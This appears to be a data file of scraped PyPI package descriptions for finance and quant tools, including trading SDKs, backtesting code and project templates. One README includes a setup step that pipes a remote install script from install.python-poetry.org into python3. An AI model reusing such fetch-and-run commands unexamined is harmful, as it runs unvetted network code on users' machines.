\ucc38\uace0importquantradingasqtfromdatetimeimportdatetimeimportpandasaspdclassMyStrategy(qt.OpenCloseStrategy):def__init__(self,**kwargs):super().__init__(**kwargs)defon_data(self):data=self.get_available_data()today_date=self.get_date()allocation={'MSCI_WORLD_ACWI':0.8,'IEF_BOND_7_10_INDEX':0.2}print(today_date,allocation)self.set_allocation(allocation)defon_end_of_algorithm(self):data=self.get_available_data(exclude_today_data=False)stock_price=data[\"market_close_df\"]['MSCI_WORLD_ACWI']self.add_to_rebalancing_factor_history(stock_price)if__name__==\"__main__\":market_df=pd.read_csv(\"./stock_bond_data.csv\",index_col=0,parse_dates=True)market_df=market_df.ffill()custom_mp_df=pd.DataFrame(data=[[0.5,0.5]],index=[datetime(2020,1,6)],columns=['MSCI_WORLD_ACWI','IEF_BOND_7_10_INDEX',])print(custom_mp_df)simulation_args={\"market_close_df\":market_df,\"market_open_price_df\":market_df,\"name\":\"OpenCloseStrategy \uc8fc\uc2dd8 \ucc44\uad8c2 \uc804\ub7b5\",\"start_date\":datetime(2005,1,1),\"end_date\":datetime(2020,7,31),\"rebalancing_periodic\":\"quarterly\",\"rebalancing_moment\":\"first\",\"benchmark_ticker\":\"MSCI_WORLD_ACWI\",\"sell_delay\":1,\"buy_delay\":2,\"custom_mp_option\":True,\"custom_mp_start_date\":datetime(2020,1,1),\"custom_mp\":custom_mp_df,\"custom_mp_sell_delay\":0,\"custom_mp_buy_delay\":1,\"portfolio_transaction_fee\":0.02}strategy=MyStrategy(**simulation_args)strategy.run()strategy.print_result_log(display_image=True)strategy.result_to_excel(folder_path=\"simulation_result5\")"} +{"package": "quantrautil", "pacakge-description": "quantrautilQuantra\u00c2\u00ae is an e-learning portal by QuantInsti\u00c2\u00ae that specializes in Algorithmic & Quantitative Trading. Quantra offers the best self-paced courses that are a mix of videos, audios, presentations, multiple choice questions and highly interactive exercises. It gives you an unmatched practical hands-on learning experience, empowering you to learn and implement complex concepts easily. There is something special about learning a trading strategy by starting with one line of code and building upon it step by step! Go Quantra!The quantrautil module helps to get the OHLCV data from Yahoo, IEXFinance or nsepy.Features!Get the OHLCV data"} +{"package": "quantready", "pacakge-description": "quantreadyA CLI to quickly launch data-driven and API-first businesses - using the modern python stack\u2705\u2705\u2705 QuantReady Stack - Templates \u2728quantreadyCLI for creating and configuring projects and using the quantready-* templatesquantready-basebuild and publish python libraries and docker images\u2714\ufe0fpoetryfor dependency management\u2714\ufe0fpre-commithooks for code formatting, linting, and testing\u2714\ufe0funittestfor testing\u2714\ufe0fgitleaksfor secrets scanning\u2714\ufe0fgithub actionsfor CI/CD\u2714\ufe0fdockerfor building containers\u2714\ufe0ftwinefor publishing to pypi or private repositories\ud83d\udd32gcloudfor publishing to private repositoriesquantready-api- A template to build and deploy fastapi applicationsauthentication - api key or oauthauthorization - RBAC via OSOrate limiting - via redisjob-queues to support long-running tasksworkerscachinggithub actions to deploy to gcloudall other features of quantreadyquantready-vendor- A template to sell and meter access to your APIs. Supports time-based and usage-based pricingsupports free and paid endpointsbilling per API call or per time-periodstripe-cli integration for managing products and billingpricing-tables, account management and checkoutusage tracking apiall other features of quantready-api[quantready-chat]A template to build and deploy chatbotsSupports WebsocketsSlack Integrationall other features of quantready-vendor\ud83d\udce6 InstallationThere are two ways to install:1. Install usingquantreadycliIt is best to install as a template usingghpipinstallquantready# Create a new repoquantreadycreate--templatequantready/quantready-base2. Install as a templateTo install and configure yourself usingghghtemplatecopyquantready/quantready\n\npipinstalltyper\npythonconfigure.py\ud83d\udcbb DevelopmentInstall dependenciesRequires poetry and python3.10 or higherInstall Poetry fromhttps://github.com/python-poetry/install.python-poetry.org#python-poetry-installercurl-sSLhttps://install.python-poetry.org|python3-# Create a virtual environmentpython3-mvenvvenvsourcevenv/bin/activate# Install dependenciespoetryinstall# Install pre-commit hookspoetryrunpre-commitinstall--install-hooks# Create a .env file and modify it's contentscp.env.example.env\ud83d\ude80 DeploymentThe best way is to use quantready cli# Configure the project and cloud providersquantreadyconfigureThis will create a .quantready file in the root of the project.GitHub Actions: On creation of a new releaseConfigurationSet a GitHub Repository SecretPYPI_API_TOKENequal to an API key generated from your PYPI account:Generate Token here:https://pypi.org/manage/account/token/Set it as a Repository Secret here:https://github.com///settings/secrets/actionsCreate a new ReleaseGotohttps://github.com/closedloop-technologies/quantready/releases/neworGotohttps://github.com///releasesClick \"Draft a new Release\"This will trigger the GitHub Action to deploy your new release to PyPiPush Docker image# Build the imagedockerbuild-tquantready/quantready.# Run the imagedockerrun-it--rmquantready/quantready# Push the image to docker hubdockerpushquantready/quantready# Push the image to gcrdockertagquantready/quantreadygcr.io//quantreadyPublish to pypi# Build the packagepoetrybuild\npoetryruntwineuploaddist/*GetPYPI_API_TOKENfromhttps://pypi.org/manage/account/token/And set it as a github secrethttps://github.com///settings/secrets/actionsPublish to private repository# Build the packagepoetrybuild\npoetryruntwineupload--repository-urlhttps://pypi.yourdomain.comdist/*\ud83d\udcdd LicenseThis project is licensed under the terms of theMIT license.\ud83d\udcda ResourcesPython Packaging User GuidePoetryPre-commitGithub ActionsDockerTwineGcloudGitHub CLI"} +{"package": "quantready-base", "pacakge-description": "quantready-basePublish public or private python libraries - using the modern python stack\u2728 FeaturesClean Code:\u2714\ufe0fpoetryfor dependency management\u2714\ufe0fpre-commithooks for code formatting, linting, and testing\u2714\ufe0funittestfor testing\u2714\ufe0fgitleaksfor secrets scanningDeployment:\u2714\ufe0fgithub actionsfor CI/CD\u2714\ufe0fdockerfor building containers\u2714\ufe0ftwinefor publishing to pypi or private repositories\ud83d\udd32gcloudfor publishing to private repositories\ud83d\udce6 InstallationThere are two ways to install:1. Install usingquantreadycliIt is best to install as a template usingghpipinstallquantready# Create a new repoquantreadycreate--templatequantready/quantready-base2. Install as a templateTo install and configure yourself usingghghtemplatecopyquantready/quantready-base\n\npipinstalltyper\npythonconfigure.py\ud83d\udcbb DevelopmentInstall dependencies# Create a virtual environmentpython3-mvenvvenvsourcevenv/bin/activate# Install dependenciespoetryinstall# Install pre-commit hookspre-commitinstall--install-hooks# Create a .env file and modify it's contentscp.env.example.env\ud83d\ude80 DeploymentThe best way is to use quantready cli# Configure the project and cloud providersquantreadyconfigureThis will create a .quantready file in the root of the project.GitHub Actions: On push tomainGithub actions are configured to run on push to main.\nIt will read the config from .quantready file and\npublish the library to pypi or private repository as well as build the docker image and push it to docker hub or gcr.Push Docker image# Build the imagedockerbuild-tquantready/quantready-base.# Run the imagedockerrun-it--rmquantready/quantready-base# Push the image to docker hubdockerpushquantready/quantready-base# Push the image to gcrdockertagquantready/quantready-basegcr.io//quantready-basePublish to pypi# Build the packagepoetrybuild\npoetryruntwineuploaddist/*GetPYPI_API_TOKENfromhttps://pypi.org/manage/account/token/And set it as a github secrethttps://github.com///settings/secrets/actionsPublish to private repository# Build the packagepoetrybuild\npoetryruntwineupload--repository-urlhttps://pypi.yourdomain.comdist/*\ud83d\udcdd LicenseThis project is licensed under the terms of theMIT license.\ud83d\udcda ResourcesPython Packaging User GuidePoetryPre-commitGithub ActionsDockerTwineGcloudGitHub CLI\u2705\u2705\u2705 QuantReady Stack - TemplatesquantreadyCLI for creating and configuring projects and using the quantready-* templatesquantready-baseThis template - build and publish python libraries and docker imagesquantready-api- A template to build and deploy fastapi applicationsauthentication - api key or oauthauthorization - RBAC via OSOrate limiting - via redisjob-queues to support long-running tasksworkerscachinggithub actions to deploy to gcloudall other features of quantready-basequantready-vendor- A template to sell and meter access to your APIs. Supports time-based and usage-based pricing.supports free and paid endpointsbilling per API call or per time-periodstripe-cli integration for managing products and billingpricing-tables, account management and checkoutusage tracking apiall other features of quantready-api[quantready-chat]A template to build and deploy chatbotsSupports WebsocketsSlack Integrationall other features of quantready-vendor"} +{"package": "quantregCF", "pacakge-description": "QuantregCFThis Python package is an implementation of the control function approach for quantile regression models proposed by Sokbae Lee in \"Endogeneity in Quantile Regression Models: A Control Function Approach,\"Journal of Econometrics, 141: 1131-1158, 2007.InstallationThis project can be installed using pip:pipinstallquantregCFUsagefromquantregCFimportquantregCFbeta,se=quantregCF(option,degree,tau_first_stage,tau_second_stage,data)quantregCFreturns a list of estimated coefficients and a list of standard errors.ParametersThe main function isquantregCF(option,degree,tau_first_stage,tau_second_stage,data)option= 0 if the second-stage quantile regression uses polynomial series.option= 1 if the second-stage quantile regression uses B-spline.degreeis the degree of the polynomial/B-spline. (integer)tau_first_stageis the value of tau for the first-stage quantile regression. (between 0 and 1)tau_second_stageis the value of tau for the second-stage quantile regression. (between 0 and 1)datais a list of length two that contains information on the dataset.data=[`dataframe`,`var_lst`]Each element indatais defined as followed:dataframeis the dataset in the pandas DataFrame format.var_lstis a list of length four that contains the name of variables of interest. The first two elements ofvar_lstare strings and the last two elements are lists of strings.`var_lst`=[`dep_var`,`endog_var`,`exog_var_lst`,`iv_var_lst`]Each element invar_lstis defined as followed:dep_varandendog_varare the names of dependent variable and endogenous right-hand side variable.exog_var_lstandiv_var_lstare the lists of names of exogenous included variables and instrumental variables.ExampleThe filefishdata.pyillustrates how to usequantregCFon the well-known Graddy\u2019s Fulton fish market data. To run the code, simply downloadfishdata.pyfrom thetestsfolder and runpython fishdata.py. Below is a code snippet showing how to load the data and usequantregCF.# load data into DataFrame `df` from https://www.kathryngraddy.org/research#pubdatadata_source=\"https://uploads-ssl.webflow.com/629e460595fdd36617348189/62a0fd19b6742078eed59f47_fish.out.txt\"df=pd.read_csv(data_source,sep=\"\\t\")var_lst=['qty','price',[\"day1\",\"day2\",\"day3\",\"day4\"],[\"stormy\",\"mixed\"]]data_lst=[df,var_lst]# regressions using B-splines in the second-stagebeta,se=quantregCF(option=1,degree=3,tau_first_stage=0.5,tau_second_stage=0.5,data=data_lst)# calculate the 95% confidence intervalci_lb=beta[0]-1.96*se[0]ci_ub=beta[0]+1.96*se[0]DependenciesNumPyPandasSciPyCVXPYUrllib"} +{"package": "quantregpy", "pacakge-description": "No description available on PyPI."} +{"package": "quant-risk", "pacakge-description": "RiskWelcome to the Quant-Risk package!Please head over tohttps://quant-risk.readthedocs.io/en/latest/to view the latest documentation for the packageTo set up your environment:install pipenv by:pip install pipenvthen go to the main directory of this repo and do:pipenv shellUpdate your setup tools package by:python -m pip install -U pip setuptoolsNow, to install the package, run the command:pipenv install quant_riskTo exit the virtual environment do:exitSince, PyPortfolioOpt requires Visual Studio C++, do the following:Before installing and setting up your environment, install Visual Studio Build Tools from here:https://visualstudio.microsoft.com/downloads/choose the Community version if you have WindowsFrom the available softwares, select \"Visual Studio Build Tools 2019\"Now your pipenv shell should be able to install PyPortfolioOptNote: The above is for Windows users, for Mac users please see:https://osxdaily.com/2014/02/12/install-command-line-tools-mac-os-x/To run a jupyter notebook instance with this venv:Activate your venv by:pipenv shellrun the command:pipenv install jupyterrun the command:pipenv run jupyter notebookAll done!\nAn instance of Jupyter notebook should now open up in your browserVersion 1.1.1Fixed minor import errorsVersion 1.1.0Added risk parity portfolios and covariance shrinkageVersion 1.0.2Removed Quandl dependency and risk free rate functionVersion 1.0.1First published working buildVersion 1.0.0Initial Build"} +{"package": "quant-risk-mgmt", "pacakge-description": "quant_risk_mgmtThis is a package for quant risk mgmt. Please go through the code before you import and use the functions."} +{"package": "quantrm-xd", "pacakge-description": "No description available on PyPI."} +{"package": "quantrocket-client", "pacakge-description": "Visithttps://www.quantrocket.comfor more details"} +{"package": "quantrocket-moonchart", "pacakge-description": "Performance tear sheets for backtest analysis"} +{"package": "quantrocket-moonshot", "pacakge-description": "Vectorized backtesting and trading engine"} +{"package": "quantrocket-trading-calendars", "pacakge-description": "No description available on PyPI."} +{"package": "quantrocket-utils", "pacakge-description": "QuantRocket Utility LibraryUtility methods for common tasks in QuantRocket.Installationquantrocket-utilscan be installed viapip:$pipinstallquantrocket-utilsDevelopmentThis project usespoetryfor development and release management.$ git clone git@github.com:boosting-alpha-bv/quantrocket-utils.git\n$ cd quantrocket-utils/\n$ poetry installRunning Tests$poetryruncoveragerun--branch--sourcequantrocket_utils-mpytestGenerating Coverage Reports$poetryruncoveragehtmlRunning flake8$poetryrunflake8quantrocket_utilstestsDeploying$poetrypublish--build--username\"${PYPI_USERNAME}\"--password\"${PYPI_PASSWORD}\"--no-interactionUsageThis library requires an external file that contains the listing information for the stocks it should translate.\nThis is typically exported from QuantRocket and then supplied at initialization time of the library.\nWork is currently under way to remove the dependency on QuantRocket for obtaining this listings file.# Import the library and initialize the ConID resolutionfromquantrocket_utilsimportinitializeasassets_init,Assetassets_init(\"//listings.csv\")# Create an Asset using the symbol namespy=Asset(\"SPY\")# The exchange is optional, unless two symbols of the same name exist on different exchangesspy=Asset(\"SPY\",\"ARCA\")# Create an Asset using the ConID# In this case the exchange can be inferred from the ConID, so it is always otpionalspy=Asset(756733)# ConID's can be strings as well, so don't worry about type conversionspy=Asset(\"756733\")# Access data on the objectspy.conid>>756733spy.symbol>>\"SPY\"spy.exchange>>\"ARCA\"# Check trading timesspy.can_trade(\"2019-03-04\",\"10:34:02\")>>True# Assets also support equality and comparison operations based on the ConID# However, this is mostly just useful for guaranteeing sorting order# Assets are also hashable and can thus be utilized in set operationsAsset(\"SPY\")>True"} +{"package": "quantrocket-zipline-extensions", "pacakge-description": "Extensions and adapters for using Zipline with QuantRocket"} +{"package": "quantron", "pacakge-description": "hehe"} +{"package": "quants", "pacakge-description": "quants packagePackage for Artifical Neural Network (ANN) based learning of quantifiers.It contains definition of scenes of elements and classes for both quantifier sampling and NN simple example package.ClassesQuantifer classesThese classes are a quantifier hierarchy with methods and definitions for:Scenesthat are composed of worldelementspertaining to use of a sentence of the form \"q as are bs\".Construction of quantifier if parameters (such as in the case of ExactlyN for instance) are required.Static method for generation of a completely random scene.Generation of permuted prototype scenes that are evaluated as true under the given quantifier q.Evaluation of a given scene (returnsTRUEfor scenes generated by the same quantifier q in the previous method).Classifier class approachThis approach assumes that quantifiers are learned as a group, essentially each quantifier qTRUEsceneis a negative example for all other quantifiers q'.\nThere is of course many scenes for which more than one quantifier is evaluated asTRUE, for instance if \"Both students are eating\" isTRUEthen \"Some students are eating\" is alsoTRUE, this can be mitigated by implicatures which we do not address.The classifier is in effect a solver for which q makes the sentence \"q as are bs\" most likely given an inputscenes.This enables us to use not only the quantifier quantify evaluation methods but the classifier in order to generate a teacher-student scheme.AE approachThe AE approach tries to let an AE look atsceneswhere a given quantifier q was used by a teacher (language speaker), this is repeated many times till whatever structure typical to scenesTRUEunder the quantifier q are encoded in the AE hidden values' represented structure. When learning is complete and when we are given a scene we use the AE as an anomaly detector to decide whether the scene is True under the quantifier q. The idea is that after seeing many qTRUEscenes a non qTRUEscene will have relatively high reconstruction errors."} +{"package": "quantsc", "pacakge-description": "No description available on PyPI."} +{"package": "quantscape", "pacakge-description": "No description available on PyPI."} +{"package": "quantscripts", "pacakge-description": "# Financial Analysis ScriptsThis repository contains a collection of Python scripts for financial analysis. The scripts cover various aspects such as Cointegration Testing, Duration Calculation, and Statistical Features computation.## Scripts### CointegrationTestTheCointegrationTestscript is designed for conducting cointegration tests on financial time series data. Cointegration is a statistical property that allows two or more time series to move together over time. This script provides functionalities for performing cointegration tests and analyzing the results.### DurationTheDurationscript focuses on calculating the duration of financial instruments. Duration is a measure of the sensitivity of the price of a bond or other debt instrument to a change in interest rates. This script allows users to compute the duration of financial instruments based on given parameters.### StatisticalFeaturesTheStatisticalFeaturesscript is dedicated to computing various statistical features of financial datasets. This includes measures such as mean, standard deviation, skewness, and kurtosis. These statistical features provide insights into the distribution and characteristics of the data.## UsageTo use these scripts, follow these general steps:git clonehttps://github.com/tonyyang1223/quantscripts.gitcd quantscripts## Build\nsetup.py sdist bdist_wheel\ntwine upload dist/*"} +{"package": "quant-sdk", "pacakge-description": "The Quant SDK is a python-wrapper for the Cryptocurrency trading API of Blocksize Capital.\nIt is a Python interface fully integrated with Blocksize CORE\u2122.\nIt enables the automation of algorithmic trading strategies, as well as accessing historical market data.\nFor requesting a (required) account please contact us viahttps://blocksize-capital.com/contact/The core part of the Quant SDK is the ability to automate trading strategies.\nThe potential applications of strategies are vast:\nwhile simple portfolio rebalancing mechanisms can be implemented,\nhigher-frequency quantitative strategies may be deployed as well.\nThe Quant SDK can be installed in the terminal as follows:pip install quant-sdkTo use the Quant SDK, you need to authenticate yourself using your personalized Blocksize CORE\u2122 API-Token.\nA Blocksize CORE\u2122 API-Token can be generated in the Blocksize MATRIX\u2122 API Token Settings.\nThe Quant SDK can be used to trade on all of our connected exchanges which can be found on our Matrix dashboard.Check outexamples/client.pyto see an example of each of the clients functions."} +{"package": "quant-sdk-lite", "pacakge-description": "Quant SDKThe Quant SDK is the third pillar of Blocksize Capital's product offer.\nIt is a Python interface fully integrated with Blocksize CORE\u2122. It allows the easy automation\nof algorithmic trading strategies, as well as accessing historical market data.The functionality of the Quant SDK is divided into two parts:Market DataThe Quant SDK seamlessly connects with the Blocksize CORE\u2122 websocket and allows the collection of real-time market data of\ndozens of cryptocurrencies across all connected exchanges. Additionally, functionalities such as the retrieval of customizable\nhistorical data using Blocksize CORE\u2122 RESTful API are accessible in a single line of code. This market data can be used for\nfurther analysis in order to optimize trading strategies.TradingThe core feature of the Quant SDK is the ability to automate trading strategies. Furthermore, the Quant SDK allows\nusers to simulate trading strategies before deploying real capital. With access to orderbook data across all our\nconnected exchanges, higher-frequency quantitative strategies may also be deployed.The following documentation will serve as a walkthrough of the functionalities of the Quant SDK, starting with the setup of the SDK.\nReading this tutorial is recommended as it delivers insights into the data structure used and explains some non-trivial parts of the\nQuant SDKTable of ContentsInstallationReal Time Market DataHistorical Market DataTradingBalancesInstallationYou can install the Quant SDK using the followingpipcommand.pip install quant-sdk-liteThe Quant SDK requires the following dependencies:pip install pandaspip install requestsCreate Your Blocksize TokenIn order to utilize the capabilites of the QuantSDK we must first generate a Blocksize API Token.A Blocksize API Token can be generated in the Blocksize MATRIX\u2122 API Token Settings.https://matrix.blocksize.capital/dashboardWe will now initialize the Blocksize Class using this API Token which will allow us to\nutilize all the capabilites of the Quant SDK.fromquant_sdk_lite.quantsdkliteimportBlockSizesdk=BlockSize('lAaUoVwxr2aOFhdS9QHa4hoVkpNPPHln99DsllOWusTLeqK2NVdIR0Ginltzr8tL5YdEGOEwIiXIHmXaUzPCYQEMbYWvwAbAyYoU9GVlPHvWq5nzxAvQZdYSzMmtj64h')We are now ready to utilize all the functionalities of the QuantSDK.Real Time Market DataThe QuantSDK enables users to access real-time data using the Blocksize Infrastructure. The following chapter\ncontains information regarding how to use the specific functions in order to receive real-time market data.Real Time Orderbook Dataget_orderbook_data(self,exchanges:str,base:str,quote:str,depth:int=1)The following example will show how the QuantSDK can be used to access real-time orderbook data in one line of code.In order to utilize this functionget_orderbook_datawe need to provide four pieces of information, namely:(1) The Exchange you wish to get orderbook data from.(2) The Base Currency(3) The Quote Currency(4) Ordebook Depth - This determines how deep we look in the orderbook. If this value is not specified by the user,\nthe function will automatically set this value to 1, which will return the best Bid/Ask price & assossiated volume.In the following example, we look for the top two Bid & Ask prices for the BTC/EUR pair on the Bittrex exchange.sdk.get_orderbook_data('Bittrex','BTC','EUR',2)This function returns the current Bittrex Orderbook best Bid / Ask prices,\nas well as the volume assossiated with those orders.[{'exchange':'BITTREX','asks':[['9188.093','0.01'],['9189.999','0.54465044']],'bids':[['9136.065','4.1373157'],['9136.064','0.05457277']]}]VWAP - Volume Weighted Average Priceget_vwap(self,base:str,quote:str,interval:str)Volume Weighted Average Price refers to the average price of a stock, weighted by the total trading volume.\nIt's used to calculate the average price of a stock over a specific timeframe. We can utilize the QuantSDK\nto gain an insight into the average price of different cryptocurrencies across multiple timeframes. In order to utilize\nthis feature, we need to decide three attributes:(1) Base Currency(2) Quote Currency(3) Time Interval - '1s' , '5s' , '30s' , '1m', '5m' , '30m' , '60m' , '2h' , '12h', '24h'In the following example, we get the VWAP of the ETH/EUR pair over a time horizon of 60 minutes.sdk.get_vwap('ETH','EUR','60m')This function returns a dictionary which includes the VWAP, Ticker, Timestamp & Volume. This data can be parsed\nand used for signals within a more sophisticated trading algorithm.{'price':298.3631794349796,'ticker':'ETHEUR','timestamp':1601046000,'volume':3962.29888435}OHLC - Open High Low Closeget_ohlc(self,base:str,quote:str,interval:str)We need to input three variables in order to execute the OHLC function:(1) Base Currency(2) Quote Currency(3) Time Interval - '1s' , '5s' , '30s' , '1m', '5m' , '30m' , '60m' , '2h' , '12h', '24h'In the following example, we will find the OHLC of the XRP/EUR pair for the proceeding 60mins.sdk.get_ohlc('XRP','EUR','60m')This function returns a dictionary which includes the OHLC Prices, Ticker & Timestamp. Furthermore, this data can\nbe used to determine entry / exit points as part of a more sophisticated trading algorithm.{'close':0.2064,'high':0.20866,'low':0.20587,'open':0.2069,'ticker':'XRPEUR','timestamp':1601049600}Historical Market DataOne major issue for Traders/Investors is access to accurate historical market data. The QuantSDK solves this\nissue by accessing historical market data in one line of code. Historical market data is a crucial tool for\ndata scientists who wish to analyse market data, as well as test trading strategies.Historical OHLCget_historic_ohlc(self,base:str,quote:str,interval:str,start_date:str,end_date:str)The Historical OHLC function can be used to access these important metrics across all pairs as well\nas multiple time intervals. Five input variables are required to successfully execute this function.(1) Base Currency(2) Quote Currency(3) Time Interval (1s, 5s, 30s, 1m, 5m, 30m, 60m)(4) Start Date (YYYY-MM-DD)(5) End Date (YYYY-MM-DD)In the following example, we will find the historic OHLC of the BTC/EUR pair,\nevery hour, for ten days in September 2020.sdk.get_historic_ohlc('BTC','EUR','60m','2020-09-10','2020-09-20')This function returns a DataFrame which can be used for further analysis.2020-09-1000:00:008675.208784.9000008665.848717.402020-09-1001:00:008717.408866.1302688693.688795.202020-09-1002:00:008789.068855.5500008775.058784.20Historical VWAP - Volume Weighted Average Priceget_historical_vwap(self,base:str,quote:str,interval:str,start_date:str,end_date:str)The Historical VWAP function can be used to access the historical Volume Weighted Average Prices of all the connected\ndigital assets, across multiple different time intervals. Five input variables are required to successful execute this function.(1) Base Currency(2) Quote Currency(3) Time Interval (1s, 5s, 30s, 1m, 5m, 30m, 60m)(4) Start Date (YYYY-MM-DD)(5) End Date (YYYY-MM-DD)The following example returns the VWAP of the BTC/EUR pair, every 30 seconds, from Sept 4th - Sept 5thsdk.get_historical_vwap('BTC','EUR','30s','2020-09-04','2020-09-05')This function returns a DataFrame consisting of Time, Price & Volume.2020-09-0421:58:008945.6852720.1433622020-09-0421:58:308940.8736191.2129432020-09-0421:59:008936.6490640.3216752020-09-0421:59:308945.9420440.1933002020-09-0422:00:008939.7400210.738045TradingOne of the most impressive features of the QuantSDK is the ability to post real as well as simulated orders.\nThis feautre allows users to buy/sell every tradeable digital asset across all the connected exchanges.Simulated Orderspost_simulated_order(self,base:str,quote:str,direction:str,quantity:Union[str,float],exchange:str=None,unlimited_funds:bool=False)The Simualted Orders function can be utilized for a variety of purposes. It takes 6 input variables:(1) Base Currency(2) Quote Currency(3) Direction ( Buy or Sell)(4) Quantity (Amount of the Base Currency you wish to Buy/Sell)(5) Exchange (If left unspecified, it will automatically place the trade on the\nexchange which offers the best price)(6) Unlimited Funds (True or False - If left unspecified, default setting is False)In the following example, we will simulate a Buy Order of 0.2 BTC on the Bittrex Exchange.sdk.post_simulated_order('BTC','EUR','BUY',0.2,'Bittrex')Notice theunlimited_fundsvariable was left unspecified, as a result, it was set to the defaultFalse.\nThis is because we wanted to simulate an order which would also check if there was enough funds in the account\nto successfully place the trade. The result of this function is printed below.{'order':{'order_id':'6c8b37d1-b621-4f73-8e64-a529cb338f7b','base_currency':'BTC','quote_currency':'EUR','direction':2,'type':1,'quantity':'0.2','bsc_token_id':'d5d08125-795a-4edf-bfc7-2db5b1240b37','user_id':'Zh4WxmYDNihRbFLIBQk6w4QjNul1'},'failed_reason':'FAILED_REASON_INSUFFICIENT_FUNDS','elapsed_time_retrieval':0,'elapsed_time_calculation':0,'average_execution_price':'','trading_fees':'','trades':None}Notice this simulated order was unsuccessful'failed_reason': 'FAILED_REASON_INSUFFICIENT_FUNDS'We will now simulate an order which assumes we have an infinite amount of funds our account.The following example will simulate a Sell Order of 10 BTC on the Binance Exchange.sdk.post_simulated_order('BTC','EUR','SELL',10,'Binance',True)In this example, we setunlimited_fundsasTrueAs a result, we have simulated an order which assumes infinite funds in our account.{'order':{'order_id':'8f1b1ce1-b8ad-4b09-897a-fe35c3ec3eaf','base_currency':'BTC','quote_currency':'EUR','direction':1,'type':1,'quantity':'10','bsc_token_id':'d5d08125-795a-4edf-bfc7-2db5b1240b37','user_id':'Zh4WxmYDNihRbFLIBQk6w4QjNul1'},'elapsed_time_retrieval':22910,'elapsed_time_calculation':177,'average_execution_price':'9215.402037268002','trading_fees':'0.01','trades':[{'exchange':'BINANCE','quantity':'10.0','apikey_id':'00000000-0000-0000-0000-000000000000','average_execution_price':'9215.402037268002','trading_fees':'0.01','funds':'-1','fee_bp':'10','trade_id':'4a363f00-9e6b-4c6e-a61b-47e4a2676f88','buffer_bp':'25'}]}Real Orderspost_market_order(self,base:str,quote:str,direction:str,quantity:Union[str,float],exchange:str)Another feauter of the QuantSDK is the ability to place orders on individual exchanges, as well as taking\nadvantage of the Blocksize SOR trading algorithm. It takes 5 input variables:(1) Base Currency(2) Quote Currency(3) Direction ( Buy or Sell)(4) Quantity (Amount of the Base Currency you wish to Buy/Sell)(5) Exchange (If left unspecified, it will automatically place the trade on the\nexchange which offers the best price)In the following example, we will sell 0.15 ETH on the Bittrex Exchange.sdk.post_market_order('eth','eur','sell',0.15,'bittrex')The function returns the unique order-ID, as well as other details about the trade.{'order':{'order_id':'02963299-f1e2-4ca6-b34a-2a89940ed42a','base_currency':'ETH','quote_currency':'EUR','direction':1,'type':1,'quantity':'0.15','bsc_token_id':'4a68e081-de91-4b40-a615-85e472a8fa75','user_id':'Zh4WxmYDNihRbFLIBQk6w4QjNul1'}}In the following example, we will attempt to buy 1 BTC on the Binance Exchange:sdk.post_market_order('BTC','EUR','BUY',1,'BINANCE')The purpose of this example is to show that if the balance is not sufficient to successfully execute the trade,\nthe function will return'failed_reason': 'FAILED_REASON_INSUFFICIENT_FUNDS'. This can be seen in the response below.{'order':{'order_id':'f8faeccb-47d9-46b0-ba28-81d54a073e46','base_currency':'BTC','quote_currency':'EUR','direction':2,'type':1,'quantity':'1','bsc_token_id':'4a68e081-de91-4b40-a615-85e472a8fa75','user_id':'Zh4WxmYDNihRbFLIBQk6w4QjNul1'},'failed_reason':'FAILED_REASON_INSUFFICIENT_FUNDS'}Order Statusorder_status(self,order_id:str)We can check the status of individual orders by using theorder_stauts()function. The only input is\nthe unique order-id.In the following example we will check the status of the 0.15 ETH Buy Order which we placed earlier.sdk.order_status('02963299-f1e2-4ca6-b34a-2a89940ed42a')This function will returns several details about the trade. Most noteably we can see the trade status.Theaggregated_status:can be interpreted as follows:(1) Open Order, (2) Closed Order, (3) Failed Order, (4) Partially Filled Order.We can also see thetimestampassosiated with the trade as well as theexecuted_price.{'aggregated_status':2,'order':{'order_id':'02963299-f1e2-4ca6-b34a-2a89940ed42a','base_currency':'ETH','quote_currency':'EUR','direction':1,'type':1,'quantity':'0.15','bsc_token_id':'4a68e081-de91-4b40-a615-85e472a8fa75','user_id':'Zh4WxmYDNihRbFLIBQk6w4QjNul1','order_timestamp':1601289889745},'orderid':'02963299-f1e2-4ca6-b34a-2a89940ed42a','trade_status':[{'trade':{'trade_id':'30c6edae-0928-4986-acf9-2d6946c22b91','exchange':'BITTREX','trade_quantity':'0.15'},'execution_status':2,'status_report':{'trade_status':3,'exchange_trade_id':'8c0b7d3c-1d22-4169-aef7-c31327582588','placed_timestamp':1601289890114,'closed_timestamp':1601289890050,'executed_quantity':'0.15','executed_price':'307.131','status_timestamp':1601289896067}}],'userid':'Zh4WxmYDNihRbFLIBQk6w4QjNul1'}BalancesThe Quant SDK makes it very simple to check the balance of your connected exchanges.sdk.get_exchange_balances()The response will be a list which displays the total value of each cryptocurrency on each connected exchange.If you have no funds on your connected exchanges, the response will simply be:None"} +{"package": "quantservice", "pacakge-description": "Quant Service"} +{"package": "quantsight", "pacakge-description": "This is a Python client for the Quantsight Data API, which allows you to fetch historical funding rates, candle data, and perform custom queries from supported exchanges. The client is easy to use and supports fetching data into a Pandas DataFrame for further analysis.Key features:\u2705 Pull data from API directly as a pandas DataFrame\u2705 Automatically cached data for faster retrieval and saved credits\u2705 Integrated OpenAI for querying data using natural language promptsInstallationTo install the Quantsight Data API Python client, usepip:pipinstallquantsightUsageFirst, import theQuantsightDataAPIclass and create an instance with your API key:importquantsightasqsapi_key=\"your_api_key\"qs=qs.Quantsight(api_key)Then, you can use the following methods to fetch data from the Quantsight Data API:Get funding rateTo fetch historical funding rates from a supported exchange, use theget_funding_ratemethod:funding_rate_df=qs.get_funding_rate(exchange=\"okx\",limit=1e6,)Get OHLCV dataTo fetch candle data from a supported exchange, use theget_ohlcvmethod:ohlcv_df=qs.get_ohlcv(period=\"1d\",exchange=\"okx\",limit=1e6,)Get OHLCV data around timeTo fetch candle data around a specific point in time, use theget_ohlcv_around_timemethod:ohlcv_around_time_df=qs.get_ohlcv_around_time(period=\"1d\",exchange=\"okx\",target_time=time(9,0,0),sample_count=10,limit=1e6,)Endpoint is useful for execution optimisation or seasonality analysisCustom query (BETA)To perform a custom query, use thecustom_querymethod:custom_query_df=qs.custom_query(\"SELECT close FROM {{okx.ohlcv.swap.1d}} LIMIT 10\",dry_run=True,use_legacy_sql=False)Each method returns a Pandas DataFrame containing the fetched data.CachingQueries are cached both in BigQuery and on the client side in order to maximise your data allowance.By default the local cache location is stored next to the clien.py file but you may change it when initialising the\nclient:qs=qs.Quantsight(api_key=api_key,cache_path=Path(\"root/your/custom/cache/location\"))You can retrieve cache metadata like so:qs.read_cache_metadata()You can delete 